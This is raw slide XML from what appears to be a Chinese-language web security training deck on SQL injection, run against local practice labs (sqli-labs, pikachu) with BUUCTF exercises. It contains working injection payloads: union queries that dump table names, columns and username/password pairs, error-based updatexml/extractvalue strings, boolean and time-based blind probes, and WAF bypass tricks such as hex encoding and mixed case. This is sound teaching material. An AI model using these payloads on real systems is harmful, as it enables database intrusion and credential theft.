              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 %23		(16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制编码绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</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2060" y="504190"/>
            <a:ext cx="5974715" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入初见（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>sqli-labs less2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>为例）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1678940"/>
            <a:ext cx="11172825" cy="3379470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/sqli-labs/Less-2?id=-1 union select 1,2,(select group_concat(username,0x7e,password) from users) %23</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0005" y="553085"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574040" y="1462405"/>
            <a:ext cx="10605135" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>select id,password from users where id= ’$id’ and password = ‘$password’</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574040" y="2772410"/>
            <a:ext cx="7823200" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqli-labs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>less-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF-[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>极客大挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2019]EasySQL</a:t>
            </a:r>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26845" y="553085"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081405" y="1128395"/>
            <a:ext cx="10685145" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>updatexml():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中更改包含所查询值的字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML_document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档对象的名称，文中为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XPath_string(Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第三个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>new_value,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式，替换查找到的符合条件的数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML_document,XPath_String,new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or updatexml(1,concat(0x7e,database()),0) #</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26845" y="553085"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081405" y="1128395"/>
            <a:ext cx="10685145" cy="3138170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>extractvalue():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中返回包含所查询值的字符串</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML_document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档对象的名称，文中为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DOC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XPath_String (Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>extractvalue(XML_document,XPath_String)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>' or extractvalue(1,concat(0x7e,database())) %23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>' union select 1,extractvalue(1,concat(0x7e,(select version())))%23</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a:t>1.Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础第一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>培训</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9525" y="572135"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>布尔盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846455" y="5387975"/>
            <a:ext cx="10301605" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=vince' and if(ascii(substr(database(),1,1))=112</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,1,0)%23&amp;submit=%E6%9F%A5%E8%AF%A2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074420" y="1387475"/>
            <a:ext cx="9627870" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当查询的结果不同时，页面返回的结果也不同，可以借此构造特定查询语句来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>爆破。</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9525" y="572135"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>延时盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846455" y="4303395"/>
            <a:ext cx="10301605" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://127.0.0.1/pikachu/vul/sqli/sqli_blind_t.php?name=-1' or if(length(database())=7,sleep(0.2),0)%23&amp;submit=%E6%9F%A5%E8%AF%A2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074420" y="1387475"/>
            <a:ext cx="9627870" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句，构造在特定条件下才发生延时的语句，从而进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>爆破。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846455" y="5759450"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>延时注入脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>介绍</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33830" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文件读取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131570" y="1350645"/>
            <a:ext cx="10110470" cy="5077460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>前置条件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>配置文件在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>my.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>读写文件需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> `secure_file_priv`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>`secure_file_priv=`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代表对文件读写没有限制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>`secure_file_priv=NULL`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代表不能进行文件读写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>`secure_file_priv=d:/phpstudy/mysql/data`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代表只能对该路径下文件进行读写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924040" y="2914650"/>
            <a:ext cx="3822700" cy="14605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33830" y="633730"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>常用绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784465" y="1510030"/>
            <a:ext cx="4245610" cy="5006340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278130" y="1289685"/>
            <a:ext cx="7308215" cy="5169535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>大小写绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>因为规则设计的问题，只匹配纯大写或纯小写的字符，对字符大小写混写直接无视，这时，我们可以利用这一点来进行绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>举例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> union select ---&gt; unIOn SeLEcT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>编码绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
